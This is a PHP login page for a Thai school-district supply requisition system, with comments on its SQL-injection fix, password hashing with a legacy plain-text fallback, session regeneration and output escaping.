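<?php
include_once 'config.php';
include_once 'functions.php';

// If already logged in, redirect to index
if (isLoggedIn()) {
    redirect('index.php');
}

$error_message = '';
$page_title = 'เข้าสู่ระบบ - ระบบเบิกพัสดุ สพม.ราชบุรี'; // Page title consumed by includes/header.php

// Check if form is submitted
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    // Both fields are required. A crafted request can send an array instead of
    // a string (e.g. username[]=x), so accept only non-empty strings.
    $username = isset($_POST['username']) && is_string($_POST['username']) ? $_POST['username'] : '';
    $password = isset($_POST['password']) && is_string($_POST['password']) ? $_POST['password'] : '';

    if ($username === '' || $password === '') {
        $error_message = 'กรุณากรอกชื่อผู้ใช้และรหัสผ่าน';
    } else {
        // Look the account up by username only, through a prepared statement:
        // the submitted values never become part of the SQL text, so the old
        // string concatenation (an SQL injection point) and sanitize_input()
        // escaping are no longer needed. Escaping here would also corrupt the
        // password check below, which is done in PHP rather than in SQL.
        $sql = "SELECT id, full_name, user_type, department_id, status, password
                FROM users
                WHERE username = ?";

        $user = null;
        $stmt = mysqli_prepare($conn, $sql);
        if ($stmt) {
            mysqli_stmt_bind_param($stmt, 's', $username);
            if (mysqli_stmt_execute($stmt)) {
                // Buffer the result so the row count is available without mysqlnd.
                mysqli_stmt_store_result($stmt);
                // Exactly one account must match, as the original query required.
                if (mysqli_stmt_num_rows($stmt) == 1) {
                    mysqli_stmt_bind_result(
                        $stmt,
                        $row_id,
                        $row_full_name,
                        $row_user_type,
                        $row_department_id,
                        $row_status,
                        $row_password
                    );
                    if (mysqli_stmt_fetch($stmt)) {
                        $user = [
                            'id' => $row_id,
                            'full_name' => $row_full_name,
                            'user_type' => $row_user_type,
                            'department_id' => $row_department_id, // Can be NULL for admin/supply_manager
                            'status' => $row_status,
                            'password' => $row_password,
                        ];
                    }
                }
            }
            // Always release the statement, even when execute failed.
            mysqli_stmt_close($stmt);
        }

        $login_ok = false;
        if ($user !== null) {
            $stored = (string) $user['password'];
            // Preferred path: the column holds a password_hash() value.
            $login_ok = password_verify($password, $stored);

            // Legacy path: rows that still hold a plain-text password. Only
            // taken when the stored value is NOT a recognised hash, so a leaked
            // hash can never be typed in as the password. Compared in constant
            // time. TODO: migrate stored passwords to password_hash() (the
            // column must hold at least 255 characters), then delete this branch.
            if (!$login_ok && empty(password_get_info($stored)['algo'])) {
                $login_ok = hash_equals($stored, $password);
            }
        }

        if ($login_ok) {
            if ($user['status'] == 'active') {
                // Issue a fresh session id at the privilege boundary so a session
                // id fixed before login cannot be reused afterwards.
                if (session_status() === PHP_SESSION_ACTIVE) {
                    session_regenerate_id(true);
                }

                // Login successful, set session variables
                $_SESSION['user_id'] = $user['id'];
                $_SESSION['full_name'] = $user['full_name'];
                $_SESSION['user_type'] = $user['user_type']; // admin, supply_manager, department, head_of_department
                $_SESSION['department_id'] = $user['department_id']; // Can be NULL for admin/supply_manager

                // Redirect to the main page
                redirect('index.php');
            } else {
                $error_message = 'บัญชีผู้ใช้นี้ถูกระงับการใช้งาน';
            }
        } else {
            // One message for both "unknown user" and "wrong password", so the
            // form does not reveal which usernames exist.
            $error_message = 'ชื่อผู้ใช้หรือรหัสผ่านไม่ถูกต้อง';
        }
    }
}
mysqli_close($conn);

// --- Include Header ---
// header.php emits <head>, opens <body>, and loads the CSS CDN
include_once 'includes/header.php';
?>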

<style>
    /* Override sidebar styles for login page */
    body {
        display: flex;
        align-items: center;
        justify-content: center;
        min-height: 100vh;
        background-color: #f8f9fa;
        margin-left: 0 !important; /* Remove margin-left from sidebar */
         flex-direction: column !important; /* Ensure content is centered */

    }
     .content-wrapper {
        margin-left: 0 !important; /* Ensure content takes full width */
        width: 100%;
        display: flex;
        align-items: center;
        justify-content: center;
        padding: 20px; /* Add padding if needed */
        flex-grow: 1;
    }

    .login-card {
        max-width: 400px;
        width: 100%;
    }

     /* Hide sidebar elements on login page if they exist */
    .sidebar, #sidebarCollapse {
        display: none !important;
    }
</style>

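<div class="card login-card shadow">
    <div class="card-body">
        <h3 class="card-title text-center mb-4">ระบบเบิกพัสดุ สพม.ราชบุรี</h3>
        <p class="text-center text-muted mb-4">กรุณาเข้าสู่ระบบ</p>

        <?php if (!empty($error_message)): ?>
            <div class="alert alert-danger" role="alert">
                <?php // Escaped on output: the message is fixed text today, but this keeps the template safe if it ever carries user input. ?>
                <?php echo htmlspecialchars($error_message, ENT_QUOTES, 'UTF-8'); ?>
            </div>
        <?php endif; ?>

        <?php // PHP_SELF includes any path-info from the request URL, so it must stay HTML-escaped. ?>
        <form method="POST" action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"], ENT_QUOTES, 'UTF-8'); ?>">
            <div class="mb-3">
                <label for="username" class="form-label">ชื่อผู้ใช้:</label>
                <input type="text" class="form-control" id="username" name="username" required autofocus>
            </div>
            <div class="mb-3">
                <label for="password" class="form-label">รหัสผ่าน:</label>
                <input type="password" class="form-control" id="password" name="password" required>
            </div>
            <div class="d-grid">
                <button type="submit" class="btn btn-primary">เข้าสู่ระบบ</button>
            </div>
        </form>
        <hr>
    </div>
</div>
<?php
// --- Include Footer ---
// footer.php loads the JS CDN and closes <body> and </html>
include_once 'includes/footer.php';
?>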
